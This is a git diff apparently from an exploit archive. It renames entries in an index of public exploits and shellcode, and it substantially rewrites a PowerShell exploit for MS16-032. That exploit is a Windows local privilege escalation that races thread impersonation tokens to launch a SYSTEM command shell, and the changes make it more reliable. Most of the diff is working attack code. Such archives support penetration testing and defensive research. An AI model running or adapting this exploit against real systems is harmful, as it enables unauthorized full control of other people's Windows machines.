diff --git a/files.csv b/files.csv index 5be144729..de78f331c 100755 --- a/files.csv +++ b/files.csv @@ -2868,7 +2868,7 @@ id,file,description,date,author,platform,type,port 3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities",2007-01-25,DarkFig,php,webapps,0 3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - (SQL Injection / XSS) Multiple Vulnerabilities",2007-01-25,ajann,asp,webapps,0 3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 (vp/configure.php) Remote File Include Vulnerability",2007-01-25,GoLd_M,php,webapps,0 -3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service Exploit (RB)",2007-01-25,MoAB,osx,dos,0 +3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service Exploit (Ruby)",2007-01-25,MoAB,osx,dos,0 3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 (package.php) Remote File Include Vulnerability",2007-01-26,"Cold Zero",php,webapps,0 3202,platforms/php/webapps/3202.txt,"AINS 0.02b (ains_main.php ains_path) Remote File Include Vulnerability",2007-01-26,"ThE dE@Th",php,webapps,0 3203,platforms/php/webapps/3203.txt,"FdScript <= 1.3.2 (download.php) Remote File Disclosure Vulnerability",2007-01-26,ajann,php,webapps,0 @@ -11735,7 +11735,7 @@ id,file,description,date,author,platform,type,port 40088,platforms/multiple/dos/40088.txt,"Adobe Flash - JXR Processing Double Free",2016-07-11,"Google Security Research",multiple,dos,0 40089,platforms/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos,0 40090,platforms/multiple/dos/40090.txt,"Adobe Flash - ATF Image Packing Overflow",2016-07-11,"Google Security Research",multiple,dos,0 -40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (msf)",2016-07-11,"Mehmet Ince",php,remote,80 +40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 - execve /bin/sh toupper evasion (97 bytes)",2004-09-26,N/A,bsdi_x86,shellcode,0 13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0 @@ -32966,7 +32966,7 @@ id,file,description,date,author,platform,type,port 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0 36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability",2015-03-30,"Claudio Viviani",php,webapps,0 -36747,platforms/linux/local/36747.c,"Fedora - abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 +36747,platforms/linux/local/36747.c,"abrt (Fedora 21) - Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 36559,platforms/php/webapps/36559.txt,"WordPress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0 36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0 @@ -35918,7 +35918,7 @@ id,file,description,date,author,platform,type,port 39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure",2016-04-21,"Fakhir Karim Reda",java,webapps,443 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0 -39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)",2016-04-21,b33f,windows,local,0 +39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0 39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 @@ -36003,7 +36003,7 @@ id,file,description,date,author,platform,type,port 39806,platforms/php/webapps/39806.txt,"WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 39807,platforms/php/webapps/39807.txt,"WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848 -39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0 +39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0 39883,platforms/php/webapps/39883.txt,"WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80 39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0 39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0 diff --git a/platforms/windows/local/39719.ps1 b/platforms/windows/local/39719.ps1 index a7e26e702..fe840a96c 100755 --- a/platforms/windows/local/39719.ps1 +++ b/platforms/windows/local/39719.ps1 @@ -15,17 +15,15 @@ function Invoke-MS16-032 { * In order for the race condition to succeed the machine must have 2+ CPU cores. If testing in a VM just make sure to add a core if needed mkay. - * The exploit is pretty reliable, however ~1/6 times it will say it succeeded - but not spawn a shell. Not sure what the issue is but just re-run and profit! * Want to know more about MS16-032 ==> https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html + .DESCRIPTION Author: Ruben Boonen (@FuzzySec) Blog: http://www.fuzzysecurity.com/ License: BSD 3-Clause Required Dependencies: PowerShell v2+ Optional Dependencies: None - E-DB Note: Source ~ https://twitter.com/FuzzySec/status/723254004042612736 .EXAMPLE C:\PS> Invoke-MS16-032 @@ -209,20 +207,19 @@ function Invoke-MS16-032 { } function Get-SystemToken { - echo "`n[?] Trying thread handle: $Thread" - echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)" + echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)" - $CallResult = [Kernel32]::SuspendThread($Thread) + $CallResult = [Kernel32]::SuspendThread($hThread) if ($CallResult -ne 0) { - echo "[!] $Thread is a bad thread, moving on.." + echo "[!] $hThread is a bad thread, exiting.." Return } echo "[+] Thread suspended" echo "[>] Wiping current impersonation token" - $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero) + $CallResult = [Advapi32]::SetThreadToken([ref]$hThread, [IntPtr]::Zero) if (!$CallResult) { - echo "[!] SetThreadToken failed, moving on.." - $CallResult = [Kernel32]::ResumeThread($Thread) + echo "[!] SetThreadToken failed, exiting.." + $CallResult = [Kernel32]::ResumeThread($hThread) echo "[+] Thread resumed!" Return } @@ -233,27 +230,29 @@ function Invoke-MS16-032 { $SQOS.ImpersonationLevel = 2 #SecurityImpersonation $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS) # Undocumented API's, I like your style Microsoft ;) - $CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos) + $CallResult = [Ntdll]::NtImpersonateThread($hThread, $hThread, [ref]$sqos) if ($CallResult -ne 0) { - echo "[!] NtImpersonateThread failed, moving on.." - $CallResult = [Kernel32]::ResumeThread($Thread) + echo "[!] NtImpersonateThread failed, exiting.." + $CallResult = [Kernel32]::ResumeThread($hThread) echo "[+] Thread resumed!" Return } - + + # Null $SysTokenHandle $script:SysTokenHandle = [IntPtr]::Zero + # 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE - $CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle) + $CallResult = [Advapi32]::OpenThreadToken($hThread, 0x0006, $false, [ref]$SysTokenHandle) if (!$CallResult) { - echo "[!] OpenThreadToken failed, moving on.." - $CallResult = [Kernel32]::ResumeThread($Thread) + echo "[!] OpenThreadToken failed, exiting.." + $CallResult = [Kernel32]::ResumeThread($hThread) echo "[+] Thread resumed!" Return } echo "[?] Success, open SYSTEM token handle: $SysTokenHandle" echo "[+] Resuming thread.." - $CallResult = [Kernel32]::ResumeThread($Thread) + $CallResult = [Kernel32]::ResumeThread($hThread) } # main() <--- ;) @@ -275,62 +274,49 @@ function Invoke-MS16-032 { Return } - # Create array for Threads & TID's - $ThreadArray = @() - $TidArray = @() + echo "[>] Duplicating CreateProcessWithLogonW handle" + $hThread = Get-ThreadHandle - echo "[>] Duplicating CreateProcessWithLogonW handles.." - # Loop Get-ThreadHandle and collect thread handles with a valid TID - for ($i=0; $i -lt 500; $i++) { - $hThread = Get-ThreadHandle - $hThreadID = [Kernel32]::GetThreadId($hThread) - # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray - if ($TidArray -notcontains $hThreadID) { - $TidArray += $hThreadID - if ($hThread -ne 0) { - $ThreadArray += $hThread # This is what we need! - } - } - } - - if ($($ThreadArray.length) -eq 0) { - echo "[!] No valid thread handles were captured, exiting!" + # If no thread handle is captured, the box is patched + if (!$hThread) { + echo "[!] No valid thread handles were captured, exiting!`n" Return } else { - echo "[?] Done, got $($ThreadArray.length) thread handle(s)!" - echo "`n[?] Thread handle list:" - $ThreadArray + echo "[?] Done, using thread handle: $hThread" + } echo "`n[*] Sniffing out privileged impersonation token.." + + # Get handle to SYSTEM access token + Get-SystemToken + + # If we fail a check in Get-SystemToken, skip loop + if ($SysTokenHandle -eq 0) { + Return } - echo "`n[*] Sniffing out privileged impersonation token.." - foreach ($Thread in $ThreadArray){ + echo "`n[*] Sniffing out SYSTEM shell.." + echo "`n[>] Duplicating SYSTEM token" + $hDuplicateTokenHandle = [IntPtr]::Zero + $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle) - # Get handle to SYSTEM access token - Get-SystemToken - - echo "`n[*] Sniffing out SYSTEM shell.." - echo "`n[>] Duplicating SYSTEM token" - $hDuplicateTokenHandle = [IntPtr]::Zero - $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle) - - # Simple PS runspace definition - echo "[>] Starting token race" - $Runspace = [runspacefactory]::CreateRunspace() - $StartTokenRace = [powershell]::Create() - $StartTokenRace.runspace = $Runspace - $Runspace.Open() - [void]$StartTokenRace.AddScript({ - Param ($Thread, $hDuplicateTokenHandle) - while ($true) { - $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle) - } - }).AddArgument($Thread).AddArgument($hDuplicateTokenHandle) - $AscObj = $StartTokenRace.BeginInvoke() - - echo "[>] Starting process race" - # Adding a timeout (10 seconds) here to safeguard from edge-cases - $SafeGuard = [diagnostics.stopwatch]::StartNew() - while ($SafeGuard.ElapsedMilliseconds -lt 10000) { + # Simple PS runspace definition + echo "[>] Starting token race" + $Runspace = [runspacefactory]::CreateRunspace() + $StartTokenRace = [powershell]::Create() + $StartTokenRace.runspace = $Runspace + $Runspace.Open() + [void]$StartTokenRace.AddScript({ + Param ($hThread, $hDuplicateTokenHandle) + while ($true) { + $CallResult = [Advapi32]::SetThreadToken([ref]$hThread, $hDuplicateTokenHandle) + } + }).AddArgument($hThread).AddArgument($hDuplicateTokenHandle) + $AscObj = $StartTokenRace.BeginInvoke() + + echo "[>] Starting process race" + # Adding a timeout (10 seconds) here to safeguard from edge-cases + $SafeGuard = [diagnostics.stopwatch]::StartNew() + while ($SafeGuard.ElapsedMilliseconds -lt 10000) { + # StartupInfo Struct $StartupInfo = New-Object STARTUPINFO $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size @@ -347,6 +333,18 @@ function Invoke-MS16-032 { 0x00000002, "C:\Windows\System32\cmd.exe", "", 0x00000004, $null, $GetCurrentPath, [ref]$StartupInfo, [ref]$ProcessInfo) + + #--- + # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop. + #--- + # Missing this check used to cause the exploit to fail sometimes. + # If CreateProcessWithLogon fails OpenProcessToken won't succeed + # but we obviously don't have a SYSTEM shell :'( . Should be 100% + # reliable now! + #--- + if (!$CallResult) { + continue + } $hTokenHandle = [IntPtr]::Zero $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle) @@ -363,10 +361,10 @@ function Invoke-MS16-032 { $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1) $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess) $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread) - } - - # Kill runspace & stopwatch if edge-case - $StartTokenRace.Stop() - $SafeGuard.Stop() + } + + # Kill runspace & stopwatch if edge-case + $StartTokenRace.Stop() + $SafeGuard.Stop() } \ No newline at end of file